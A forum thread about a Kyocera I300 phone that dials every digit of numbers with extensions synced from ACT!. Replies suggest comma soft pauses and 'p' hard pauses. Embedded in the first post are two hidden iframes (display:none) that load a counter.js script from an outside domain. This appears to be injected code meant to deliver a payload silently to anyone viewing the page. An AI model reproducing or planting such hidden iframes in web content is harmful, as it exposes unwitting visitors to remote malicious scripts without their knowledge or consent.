+ Reply to Thread

I300 dialing bug

If your phone number has extension on it, the phone will dial all digits. I'm synching from ACT! to the I300 so that may be part of the problem. For example, the number shows up in the phone book as 503-555-1212 X123. When the I300 dials all these numbers, the Sprint phone system barfs So I have to manually dial the number or figure out another field to place the extension in the ACT! database so I can auto dial the main number and then manually enter the extension.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Dan
    You could do a soft or hard pause. I don't know how ACT! will like the hard pause (I don't know how standard it is) but the soft pause character has been around for years (literally...) so I would think you could use that. I've used it in Outlook with no issues. All you do is insert a comma for a two-second pause. So, now your number is:

503-555-1212,123

Or if you need more than two seconds feel free to put in more commas. Two seconds each time. I'd be surprised if ACT! wouldn't accept it. If you want to try a hard pause the I300 uses the letter "p" for it. It also can use the letter "t" for a soft pause.

I forgot to mention: If you're not familiar with a hard pause, it's a pause that requires you to press a key to continue. I use one with my bank's automated phone line since it can ring anywhere from 1-3 times.

I still may have an issue as the ACT! conduit places an "x" in front of the extension in the palm database. I need to investigate this further. thanks for the help.